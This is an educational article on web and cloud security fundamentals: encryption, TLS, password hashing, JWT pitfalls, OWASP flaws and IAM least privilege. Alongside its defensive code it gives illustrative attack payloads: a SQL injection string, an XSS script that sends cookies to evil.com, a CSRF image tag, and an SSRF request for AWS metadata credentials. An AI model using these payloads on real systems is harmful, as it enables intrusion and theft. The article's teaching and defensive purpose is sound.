Security Fundamentals - What Attackers Know That You Might Not // Megha Bose


In April 2021, a security researcher announced the discovery of 533 million Facebook records - names, phone numbers, Facebook IDs, locations - posted freely on a hacker forum. The data was old, collected in 2019, but the cause was instructive: a mobile API endpoint that allowed phone number lookup had inadequate rate limiting. Attackers systematically enumerated hundreds of millions of phone numbers, scraping the linked profile data for each. No cryptography was broken. No zero-day vulnerability was exploited. A basic operational oversight - an API without effective throttling - exposed half a billion users.

This is how most breaches actually work. Not through brilliant cryptographic attacks, but through overlooked rate limits, SQL strings assembled from user input, passwords hashed with MD5, and credentials committed to GitHub. The cryptography is usually fine. The application logic is where things fall apart.

The Threat Model: What You’re Actually Defending Against

Before listing vulnerabilities, it helps to understand who attacks systems and why. The vast majority of attacks are opportunistic and automated. Bots scan the internet continuously for known vulnerable software versions, default credentials, exposed admin panels, and common misconfigurations. A new internet-facing server with a default password can be compromised within hours.

Targeted attacks are rarer and more sophisticated - a competitor seeking trade secrets, a nation-state targeting critical infrastructure, a disgruntled insider. These are harder to defend against but also affect fewer organizations.

The practical implication: fixing the common, well-documented vulnerabilities eliminates the vast majority of real-world risk. OWASP’s Top 10 has featured many of the same categories since its first edition in 2003 because the same mistakes keep appearing.

Symmetric vs Asymmetric Encryption

Symmetric encryption uses one key for both encryption and decryption. The gold standard is AES-256-GCM: AES (Advanced Encryption Standard) with a 256-bit key, in GCM (Galois/Counter Mode) which provides both confidentiality and integrity. If someone tampers with the ciphertext, decryption fails. This is what encrypts your data at rest, your database backups, and the payload of TLS connections.

The fundamental problem with symmetric encryption: both parties need the same key. How do you exchange a secret key over an insecure channel without an attacker intercepting it? This is where asymmetric encryption comes in.

Asymmetric encryption uses a mathematically linked key pair: a public key and a private key. Anything encrypted with the public key can only be decrypted with the private key. The public key is, by design, public - share it with anyone. The private key never leaves your control.

RSA (Rivest-Shamir-Adleman) is the classical asymmetric algorithm, based on the computational hardness of factoring large integers. A 2048-bit RSA key is considered secure today; 4096-bit for long-term secrets. ECC (Elliptic Curve Cryptography) achieves equivalent security with much shorter keys - a 256-bit ECC key is roughly as secure as a 3072-bit RSA key, with faster operations and smaller certificates.

Asymmetric encryption solves the key exchange problem but is computationally expensive - orders of magnitude slower than AES. This is why TLS uses asymmetric cryptography to establish a shared secret and then switches to symmetric AES for the actual data. The padlock represents this hybrid approach.

The TLS Handshake: What Happens When You See the Padlock

When your browser connects to https://bank.com, here’s what happens before a single byte of your request is sent:

ClientHello: Your browser announces which TLS version it supports (1.3 preferred), which cipher suites it can use, and a random nonce. It also sends a Diffie-Hellman key share.
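ServerHello + Certificate: The server responds with its chosen cipher suite, its own DH key share, and its certificate - a document containing the server’s public key, signed by a Certificate Authority (CA). It also signs the handshake transcript with the matching private key, proving that it actually holds that key.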
Certificate verification: Your browser checks the certificate against its built-in trust store (a list of root CAs embedded in your OS or browser). It verifies that the CA’s signature on the certificate is valid, that the certificate hasn’t expired, and that the hostname matches.
Key derivation: Both sides independently compute the same shared secret from the DH key shares (without ever transmitting that secret). They derive symmetric encryption keys from this shared secret.
Encrypted connection: All subsequent traffic is encrypted with the negotiated symmetric cipher, such as AES-256-GCM. The padlock appears.
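The key derivation step can be illustrated with a toy Diffie-Hellman exchange. This is a minimal sketch under loud assumptions: the prime P, the generator G, and the single SHA-256 call are illustrative stand-ins. Real TLS 1.3 uses standardized groups such as X25519 and an HKDF-based key schedule, and these toy parameters are far too small to be secure.

```python
import hashlib
import secrets

# Toy public parameters (assumption, NOT secure): a 127-bit Mersenne prime
# and a small generator. Real TLS uses standardized groups such as X25519.
P = 2**127 - 1
G = 3


def make_key_share() -> tuple[int, int]:
    """Return (private exponent, public key share)."""
    private = secrets.randbelow(P - 3) + 2  # random value in [2, P - 2]
    public = pow(G, private, P)             # only this value is transmitted
    return private, public


def derive_key(own_private: int, peer_public: int) -> bytes:
    """Combine our private exponent with the peer's public share."""
    shared_secret = pow(peer_public, own_private, P)
    # Stand-in for the TLS key schedule: hash the secret into a 32-byte key.
    return hashlib.sha256(shared_secret.to_bytes(16, "big")).digest()


client_private, client_share = make_key_share()
server_private, server_share = make_key_share()

# Each side uses its own private value and the other side's public share.
client_key = derive_key(client_private, server_share)
server_key = derive_key(server_private, client_share)
```

Both sides arrive at the same 32-byte key even though only the public shares crossed the wire, which is the property the handshake relies on.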

TLS 1.3 (2018) streamlined this to one round-trip (1-RTT) and eliminated several weak cipher options that had plagued TLS 1.2. It also introduced 0-RTT resumption for returning connections - at the cost of some replay attack risk for non-idempotent requests.

The certificate chain connects your server to a trust anchor. Your server’s certificate is signed by an intermediate CA, which is signed by a root CA in the browser’s trust store. If any link is invalid, expired, or revoked, the browser shows a warning. Let’s Encrypt (free, automated certificates) has eliminated the certificate management excuse for running HTTP; AWS ACM (Certificate Manager) handles renewal automatically for resources in your AWS account.

Password Storage: Why Slow Is Good

The naive developer stores passwords in plaintext. A slightly less naive developer hashes them with SHA-256. Both are wrong.

Fast hashes such as MD5 and SHA-256 are designed for throughput - modern GPUs compute billions of them per second. An attacker with your hashed password database can run a dictionary attack: hash every word in a dictionary, every common password, every known leaked password, and compare against your hashes. A common 8-character password hashed with unsalted MD5 can be cracked in seconds, and the same attack works against SHA-256 at a somewhat lower rate.

The fix has two components: salting and slow hashing.

A salt is a random value prepended to the password before hashing. Two users with the same password get different hashes. This defeats precomputed rainbow tables (where an attacker pre-hashes every possible password) because the salt makes every hash unique.

Slow hashing algorithms are intentionally computationally expensive:

bcrypt takes a configurable cost factor, exposed as “rounds” in most libraries. The cost is logarithmic: rounds=12 means $2^{12} = 4096$ iterations, and each increment doubles the work. At that setting a hash takes on the order of 100ms on a typical server - imperceptible for a login - but catastrophic for an attacker trying billions of combinations.

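Argon2 (winner of the 2015 Password Hashing Competition) goes further. It’s memory-hard: each hash must fill a configurable amount of RAM, typically tens of megabytes up to a gigabyte or more, and computing it with less memory costs disproportionately more time. GPUs and ASICs designed for fast hashing lose most of their parallelism advantage because every concurrent guess needs its own block of memory. Argon2id is the recommended variant for new systems.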

import bcrypt

# Registration - hashing is slow by design (~100ms at rounds=12)
def hash_password(plaintext: str) -> str:
    hashed = bcrypt.hashpw(plaintext.encode(), bcrypt.gensalt(rounds=12))
    # Store the returned string in your database - the salt is embedded in it
    return hashed.decode()

# Login - checkpw re-hashes the candidate with the salt embedded in stored_hash
def verify_password(plaintext: str, stored_hash: str) -> bool:
    return bcrypt.checkpw(plaintext.encode(), stored_hash.encode())

Never use SHA-1, SHA-256, or MD5 for passwords. They’re cryptographic hash functions designed for speed and data integrity, not for password storage.
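The effect of salting and memory-hard hashing can also be sketched with the standard library alone. The example below swaps in scrypt, a different memory-hard function available as hashlib.scrypt, because Argon2 needs a third-party package. The function names and cost parameters are assumptions chosen for illustration, not recommended production settings.

```python
import hashlib
import hmac
import secrets

# Assumed cost parameters: n=2**14, r=8, p=1 needs roughly 16 MiB per hash.
SCRYPT_PARAMS = {"n": 2**14, "r": 8, "p": 1, "maxmem": 64 * 1024 * 1024, "dklen": 32}


def scrypt_hash(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest); store both alongside the user record."""
    salt = secrets.token_bytes(16)  # fresh random salt for every password
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return salt, digest


def scrypt_verify(password: str, salt: bytes, expected: bytes) -> bool:
    """Re-hash the candidate with the stored salt and compare in constant time."""
    candidate = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected)


# Two users with the same password end up with different stored digests.
salt_a, digest_a = scrypt_hash("correct horse")
salt_b, digest_b = scrypt_hash("correct horse")
```

Because the salts differ, a precomputed table built for one digest is useless against the other, and each guess costs the attacker the full memory and time budget.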

Authentication vs Authorization

These two concepts are frequently confused, and the confusion leads to security holes.

Authentication (authn) answers “who are you?” It’s the process of verifying identity. A valid session token, a correct password, a signed JWT, an OAuth token - these are authentication mechanisms. A request that fails authentication gets a 401 Unauthorized response.

Authorization (authz) answers “what are you allowed to do?” It’s checked after authentication. Can user 42 read invoice 9981? Can this service account delete S3 objects? Authorization failures return 403 Forbidden.

The classic bug: an application authenticates the user on login and stores their user ID in a session. It then treats any authenticated request as authorized, without checking ownership of the object being requested. User 42 requests /invoices/9981. The server fetches invoice 9981 from the database and returns it - without checking whether user 42 owns invoice 9981. This is IDOR: Insecure Direct Object Reference. It’s among the most common authorization vulnerabilities, and it falls under “Broken Access Control”, which the 2021 OWASP Top 10 ranks at #1.

The fix is always to authorize at the data layer: SELECT * FROM invoices WHERE id = $1 AND owner_id = $2. The user ID must constrain the query, not just be trusted as metadata.
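A minimal sketch of the ownership-constrained query, using an in-memory SQLite database. The table layout, the sample rows, and the get_invoice helper are assumptions made up for this example; SQLite uses ? placeholders where the query above uses $1 and $2.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner_id INTEGER, total REAL)"
)
conn.execute("INSERT INTO invoices VALUES (9981, 7, 120.0)")   # owned by user 7
conn.execute("INSERT INTO invoices VALUES (9982, 42, 75.5)")   # owned by user 42


def get_invoice(conn: sqlite3.Connection, invoice_id: int, current_user_id: int):
    """Fetch an invoice only if it belongs to the authenticated user."""
    return conn.execute(
        "SELECT id, owner_id, total FROM invoices WHERE id = ? AND owner_id = ?",
        (invoice_id, current_user_id),
    ).fetchone()  # None means "not found or not yours"


own_invoice = get_invoice(conn, 9982, current_user_id=42)
someone_elses = get_invoice(conn, 9981, current_user_id=42)
```

Here current_user_id must come from the server-side session, never from the request body or URL. When the lookup returns None the handler can answer 404 or 403 without revealing whether the invoice exists.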

JWT Structure and Pitfalls

A JWT looks like three base64url-encoded sections separated by dots:

eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiI0MiIsImV4cCI6MTcyNTM5MzYwMCwicm9sZSI6ImFkbWluIn0.{sig}

Decode the sections:

Header: {"alg": "RS256"}
Payload: {"sub": "42", "exp": 1725393600, "role": "admin"}
Signature: computed over the encoded header and payload (joined by a dot) using the signing key
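The first two sections can be decoded with nothing more than base64 and JSON, which is a useful reminder that they are encoded, not encrypted. A short sketch using the sample token above (the b64url_decode helper is a name introduced here):

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode base64url, restoring the padding that JWTs strip."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


token = (
    "eyJhbGciOiJSUzI1NiJ9"
    ".eyJzdWIiOiI0MiIsImV4cCI6MTcyNTM5MzYwMCwicm9sZSI6ImFkbWluIn0"
    ".{sig}"
)

header_b64, payload_b64, _signature = token.split(".")
header = json.loads(b64url_decode(header_b64))
payload = json.loads(b64url_decode(payload_b64))
```

Decoding proves nothing about authenticity. Claims such as role must not be trusted until the signature has been verified.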

The server verifies the signature using the issuer’s public key (for RS256) or the shared secret (for HS256). If valid, it trusts the claims in the payload without a database lookup. This stateless design is what makes JWT attractive for horizontally scaled services. The payload is only encoded, not encrypted: anyone holding the token can read the claims.

The alg: none attack: Early JWT libraries honored a token that declared "alg": "none" in the header and omitted the signature. The attacker could forge any claims, declare no algorithm, and the library would accept it. Always explicitly specify the allowed algorithms server-side and never accept none.

Weak secrets: HS256 signed with a guessable secret (common passwords, “secret”, “your-256-bit-secret”) can be brute-forced. Either use a long random secret (32+ bytes) or switch to RS256/ES256 where the signing key is a private key that never needs to be shared.

Missing expiry: A JWT without an exp claim is valid forever. Set short expiry (15 minutes for access tokens), and use refresh tokens - server-side opaque tokens that can be revoked - to issue new access tokens.

Token storage in browsers: Storing JWTs in localStorage exposes them to XSS - any injected script can read localStorage. Storing in httpOnly cookies prevents JavaScript access but introduces CSRF risk. The httpOnly cookie with SameSite=Strict or Lax is generally the safer tradeoff.
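Several of these pitfalls can be seen in one place in a hand-rolled HS256 verifier. This is a teaching sketch built on the standard library, not a replacement for a maintained JWT library; the function names and the ALLOWED_ALGS constant are assumptions introduced for the example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

ALLOWED_ALGS = {"HS256"}  # server-side allowlist; "none" is never accepted


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now: Optional[float] = None) -> dict:
    """Return the claims, or raise ValueError if any check fails."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError as exc:
        raise ValueError("malformed token") from exc
    # Pitfall 1: never let the token choose an algorithm outside the allowlist.
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        raise ValueError("algorithm not allowed")
    # Recompute the signature over the exact encoded bytes that were sent.
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    # Pitfall 3: a token without exp is rejected rather than valid forever.
    exp = claims.get("exp")
    current = time.time() if now is None else now
    if not isinstance(exp, (int, float)) or exp <= current:
        raise ValueError("token expired or missing exp")
    return claims
```

A typical call pairs this with a long random secret, for example secrets.token_bytes(32), and an exp roughly 15 minutes in the future. The now parameter exists only to make the expiry check easy to test.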

OWASP Top 10: The Recurring Failures

SQL Injection

An attacker injects SQL syntax into input fields that gets interpolated into a database query:

# Vulnerable - never do this
query = f"SELECT * FROM users WHERE email = '{user_input}'"
# user_input = "'; DROP TABLE users; --"
# Resulting SQL: SELECT * FROM users WHERE email = ''; DROP TABLE users; --'
# (a driver that permits stacked statements will run the DROP)

# Safe - parameterized query; %s is the driver's placeholder, not string formatting
cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

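Parameterized queries are the complete fix for injected values. The driver sends the user input separately from the SQL text (or escapes it on your behalf), so it is always treated as data, never interpreted as SQL syntax. Placeholders can’t stand in for identifiers such as table or column names, so validate those against a fixed allowlist. ORMs use parameterized queries by default, but raw string formatting anywhere in your codebase is a vulnerability regardless of framework.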
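The difference is easy to reproduce against an in-memory SQLite database. The table contents and the payload below are assumptions chosen for the demonstration, and SQLite uses ? as its placeholder rather than %s.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
conn.executemany(
    "INSERT INTO users (email) VALUES (?)",
    [("alice@example.com",), ("bob@example.com",)],
)

# Classic boolean-based payload: closes the string and adds an always-true clause.
user_input = "' OR '1'='1"

# Vulnerable: the payload becomes part of the SQL text.
vulnerable_rows = conn.execute(
    f"SELECT id, email FROM users WHERE email = '{user_input}'"
).fetchall()

# Safe: the payload is bound as a value and compared literally against email.
safe_rows = conn.execute(
    "SELECT id, email FROM users WHERE email = ?", (user_input,)
).fetchall()
```

The interpolated query matches every row in the table, while the parameterized one matches none, because no user has that literal string as an email address.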

Cross-Site Scripting (XSS)

An attacker injects JavaScript into your page that executes in other users' browsers, stealing cookies or session tokens:

<!-- If user_comment is: <script>fetch('evil.com?c='+document.cookie)</script> -->
<div>{{ user_comment }}</div>  <!-- rendered without escaping - vulnerable -->

Defenses: escape all user-supplied content in HTML output (< → &lt;, > → &gt;, " → &quot;, & → &amp;). Use frameworks that auto-escape by default (React, Jinja2 with autoescape enabled). Add a Content Security Policy header that allowlists script sources:

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
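Both defenses can be sketched with Python’s standard library. In a real application the template engine would normally do the escaping; the variable names here are assumptions for illustration, and the nonce has to be generated fresh for every response.

```python
import html
import secrets

user_comment = "<script>fetch('evil.com?c='+document.cookie)</script>"

# Escaping turns markup characters into entities, so the browser shows the
# comment as text instead of executing it.
safe_fragment = f"<div>{html.escape(user_comment)}</div>"

# A per-response nonce: only <script nonce="..."> tags carrying this value run.
nonce = secrets.token_urlsafe(16)
csp_header = f"default-src 'self'; script-src 'self' 'nonce-{nonce}'"
```

With the policy in place, an injected script tag that slips past escaping still lacks the nonce and is blocked by browsers that enforce CSP.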

CSRF (Cross-Site Request Forgery)

A malicious page tricks your browser into making a state-changing request to a site where you’re authenticated:

<!-- On attacker.com -->
<img src="https://bank.com/transfer?to=attacker&amount=1000">

Your browser sends your bank’s session cookie along with this request. The bank sees an authenticated request.

Defenses: SameSite=Strict cookies don’t get sent on cross-site requests - this alone defeats most CSRF in modern browsers. CSRF tokens (a random value in a hidden form field that the server validates) work even for older browsers. State-changing actions should also never be reachable through GET, as the transfer URL above is.
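The token defense is small enough to sketch directly. The session dict below stands in for whatever server-side session store the framework provides, and both function names are hypothetical.

```python
import hmac
import secrets
from typing import Optional


def issue_csrf_token(session: dict) -> str:
    """Create a random token, remember it server-side, and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted: Optional[str]) -> bool:
    """Accept the request only if the submitted token matches the session's."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}
form_token = issue_csrf_token(session)  # rendered into a hidden form field
```

A page on attacker.com can make the browser send the session cookie, but it cannot read the token out of the legitimate form, so its forged request fails the check.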

SSRF (Server-Side Request Forgery)

An attacker tricks your server into making HTTP requests to internal network addresses:

POST /api/fetch-url
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}

169.254.169.254 is the AWS EC2 Instance Metadata Service. IMDSv1 required no authentication - any code running on the instance could retrieve the IAM credentials attached to that instance. This is how the Capital One breach worked in 2019: a misconfigured WAF on an EC2 instance could be tricked into making SSRF requests, and the IMDS returned IAM credentials with excessive permissions, granting access to 100 million customer records in S3.

IMDSv2 (the default on many newer instances and AMIs, and enforceable on existing ones) requires an initial PUT request to obtain a session token before any metadata is accessible. The token must then be sent in the X-aws-ec2-metadata-token request header on every metadata call. An SSRF flaw that can only make the server issue a GET to an attacker-chosen URL typically can’t send the PUT or set that header. The defense in application code: validate URLs against an allowlist before fetching them; block requests to RFC 1918 private ranges, loopback addresses, and the link-local 169.254.0.0/16 range.
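A minimal sketch of the application-side check, combining a host allowlist with a block on internal IP literals. ALLOWED_HOSTS and both function names are assumptions for this example. A production version would also need to check the addresses a hostname resolves to and pin the connection to them, since DNS can point an innocent-looking name at an internal address.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.example.com"}  # hypothetical allowlist of fetch targets


def is_internal_ip(host: str) -> bool:
    """True if host is an IP literal in a private, loopback, or link-local range."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; the hostname allowlist handles it
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def is_url_allowed(url: str) -> bool:
    """Allow only http(s) URLs whose host is explicitly allowlisted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if host is None or is_internal_ip(host):
        return False
    return host in ALLOWED_HOSTS
```

With this check in front of the fetch, the metadata URL from the request above is refused before any outbound connection is made.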

Cloud IAM: Least Privilege in Practice

AWS IAM (Identity and Access Management) implements fine-grained authorization for every AWS API call. An IAM policy is a JSON document that specifies which actions are allowed on which resources:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::my-bucket/reports/*"
    }
  ]
}

Least privilege means every role, user, and service should have only the permissions needed for its function - no more. The Capital One breach exploited an IAM role attached to an EC2 instance whose S3 read permissions reached far beyond the buckets the service needed.

In practice, IAM policies accumulate over time. Engineers add permissions to unblock work and rarely remove them. AWS IAM Access Analyzer identifies policies that are more permissive than necessary. SCPs (Service Control Policies) in AWS Organizations enforce maximum permission boundaries across an entire account or OU.
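As a rough illustration of what policy drift looks like, the sketch below flags Allow statements that use wildcards. It is a hypothetical lint, far simpler than what IAM Access Analyzer does, and the function name and sample policies are made up for this example.

```python
def find_overbroad_statements(policy: dict) -> list:
    """Return Allow statements whose Action or Resource contains a wildcard."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may appear unwrapped
        statements = [statements]
    flagged = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        wildcard_action = any(a == "*" or a.endswith(":*") for a in actions)
        wildcard_resource = any(r == "*" for r in resources)
        if wildcard_action or wildcard_resource:
            flagged.append(stmt)
    return flagged


narrow_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::my-bucket/reports/*",
        }
    ],
}
broad_policy = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}
```

The narrow policy passes untouched, while the broad one is flagged. A check like this can run in CI against policy files, though it says nothing about which permissions are actually used.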

Secrets management: Credentials should never live in environment variables baked into container images or committed to configuration files. AWS Secrets Manager and Parameter Store store credentials encrypted at rest and provide IAM-controlled access; Secrets Manager also supports automatic rotation. HashiCorp Vault provides vendor-neutral secrets management with dynamic credentials (short-lived secrets generated on-demand and automatically expired).

The Critique: TLS Solved the Wrong Problem

TLS made the internet’s transport layer confidential and authenticated. An eavesdropper between your browser and the server can no longer read your traffic or inject data. This was a genuine achievement.

But TLS does not protect against the attack surface that actually dominates security incidents. SQL injection happens inside the application. XSS affects how your server generates HTML. CSRF exploits browser cookie behavior. IDOR is an authorization logic error. SSRF happens when your server fetches URLs from user input. None of these are transport-layer problems; TLS is entirely irrelevant to all of them.

The “https” padlock has become a misleading signal of trustworthiness. Phishing sites routinely use valid TLS certificates - the padlock just means the connection is encrypted, not that the site is legitimate or that the application is secure.

Future Outlook

Zero-trust networking replaces the perimeter model (trust internal traffic, distrust external) with per-request authentication and authorization for every connection regardless of network location. The assumption is that the network is hostile - even internal. Google’s BeyondCorp, launched internally around 2011, is the canonical implementation. Every access to internal systems requires verifiable credentials and passes through a policy engine, regardless of whether the requester is in a Google office or on public Wi-Fi.

Confidential computing addresses a different threat: protecting data from the cloud provider and its infrastructure. Intel SGX (Software Guard Extensions) creates hardware-enforced enclaves inside a process, while AMD SEV (Secure Encrypted Virtualization) encrypts the memory of an entire virtual machine. In both cases data is in plaintext only inside the CPU, in memory regions that the hypervisor can’t read. This enables workloads with sensitive data to run in cloud environments with hardware-backed assurance, verifiable through remote attestation, that the cloud provider cannot access the plaintext.

The shift toward smaller blast radii - short-lived credentials, per-service IAM roles, mTLS between microservices, hardware security modules for key material - reflects the industry’s growing acceptance that breaches are inevitable and the goal is containment.

Concept	Key Point
Symmetric encryption	AES-256-GCM; fast, one key; key distribution is the problem
Asymmetric encryption	RSA / ECC; public key is public; private key never leaves
TLS handshake	DH key exchange → shared secret → symmetric AES; certificate verifies server identity
bcrypt / Argon2	Intentionally slow password hashing; salted; defeats GPU brute force
Authentication vs authorization	authn = who are you; authz = what can you do; 401 vs 403
IDOR	Most common authz bug; always constrain queries by owner ID
SQL injection	Parameterized queries are the complete fix
XSS	Escape output; CSP headers; auto-escaping frameworks
CSRF	SameSite=Strict cookies; CSRF tokens
SSRF	Validate and restrict URLs; IMDSv2 mitigates metadata endpoint attacks
JWT pitfalls	alg: none attack; weak secrets; missing expiry; storage (httpOnly cookie preferred)
Least privilege	IAM roles get only what they need; Access Analyzer flags excess permissions
Zero-trust	Authenticate every request regardless of network location
